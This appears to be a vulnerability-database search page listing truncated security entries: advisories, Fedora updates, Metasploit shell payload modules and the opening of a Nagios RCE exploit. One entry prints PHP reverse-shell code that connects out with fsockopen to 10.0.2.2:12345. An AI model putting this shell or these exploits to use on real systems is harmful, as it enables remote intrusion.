Bug in OpenSSH Opens Linux Machines to Password Cracking Attack

A simple but highly critical vulnerability recently disclosed in the most widely used OpenSSH software allows attackers to try thousands of password login attempts per connection in a short period. OpenSSH is the most popular software widely used for secure remote access to Linux-based systems...

PT-2015-3444

Name of the Vulnerable Software and Affected Versions OpenSSH versions through 6.9 Description The issue is related to the kbdint next device function in the OpenSSH sshd service, which does not properly restrict the processing of keyboard-interactive devices within a single connection. This make...

Cheat - Create and view interactive cheatsheets on the command-line

cheat allows you to create and view interactive cheatsheets on the command-line. It was designed to help remind nix system administrators of options for commands that they use frequently, but not frequently enough to remember. cheat depends only on python and pip. Example The next time you're...

SQL injection vulnerability in txtContent parameter in InteractiveCommunication/InterActiveIndex.aspx of Wave Government Service Platform

Wave software government system is an industry informatization application system built on the basis of cloud computing and big data. There is a SQL injection vulnerability in the txtContent parameter of the InteractiveCommunication/InterActiveIndex.aspx of the Wave government service platform,...

Windows Interactive Powershell Session, Reverse TCP

Listen for a connection and spawn an interactive powershell session This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' module MetasploitModule CachedSize = :dynamic include...

Windows Interactive Powershell Session, Bind TCP

Listen for a connection and spawn an interactive powershell session This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' Extends the Exec payload run a powershell command module MetasploitModule...

[SECURITY] Fedora 21 Update: mksh-50f-1.fc21

mksh is the MirBSD enhanced version of the Public Domain Korn shell pdksh, a bourne-compatible shell which is largely similar to the original AT&T Korn shell. It includes bug fixes and feature improvements in order to produce a modern, robust shell good for interactive and especially script use,...

[SECURITY] Fedora 20 Update: mksh-50f-1.fc20

mksh is the MirBSD enhanced version of the Public Domain Korn shell pdksh, a bourne-compatible shell which is largely similar to the original AT&T Korn shell. It includes bug fixes and feature improvements in order to produce a modern, robust shell good for interactive and especially script use,...

Windows Interactive Powershell Session, Bind TCP

Listen for a connection and spawn an interactive powershell session This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' Extends the Exec payload to run a powershell command module MetasploitModule...

Windows Interactive Powershell Session, Reverse TCP

Listen for a connection and spawn an interactive powershell session This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' module MetasploitModule CachedSize = :dynamic include...

Windows Interactive Powershell Session, Bind TCP

Interacts with a powershell session on an established socket connection This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/powershell' module MetasploitModule CachedSize = :dynamic include Msf::Payload::Sing...

[SECURITY] Fedora 22 Update: jython-2.7-0.7.rc2.fc22

Jython is an implementation of the high-level, dynamic, object-oriented language Python seamlessly integrated with the Java platform. The predecessor to Jython, JPython, is certified as 100% Pure Java. Jython is freely available for both commercial and non-commercial use and is distributed with...

Cisco Unified Communications Manager Interactive Voice Response Interface SQL Injection Vulnerability

A vulnerability in the Interactive Voice Response IVR interface of Cisco Unified Communications Manager UCM could allow an unauthenticated, remote attacker to conduct SQL injection attacks. The vulnerability is due to a lack of input validation on user-supplied input within SQL queries. An attack...

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

Interactive Data eSignal Listener Buffer Overflow - Ver2 (CVE-2004-1868)

eSignal is a real-time market data and support tool provided by Interactive Data Corporation. The product supplies financial market data and more for traders over the internet. To facilitate the receipt of incoming data, eSignal opens a local, listening socket on TCP Port 80. There exists a buffe...

[SECURITY] Fedora 21 Update: mapserver-6.2.2-1.fc21

Mapserver is an internet mapping program that converts GIS data to map images in real time. With appropriate interface pages, Mapserver can provide an interactive internet map based on custom GIS data...

MySQL Login Utility

This module simply queries the MySQL instance for a specific user/pass default is root with blank. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credentialcollection' require...

CapTipper - Malicious HTTP traffic explorer tool

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic. CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations...

Hex-Rays IDA Pro Buffer Overflow Vulnerability

Hex-Rays IDA Pro is a set of static decompiler software from Hex-Rays Belgium. A buffer overflow vulnerability exists in Hex-Rays IDA Pro versions prior to 6.6 cumulative fix 2014-12-24, no detailed vulnerability details are provided at this time...

Nagios-history.cgi-Exec-Code

CVE-2012-6096 - Nagios history.cgi Remote Command Execution Another year, another reincarnation of classic and trivial bugs to exploit. This time we attack Nagios.. or more specifically, one of its CGI scripts. !/usr/bin/python CVE-2012-6096 - Nagios history.cgi Remote Command Execution...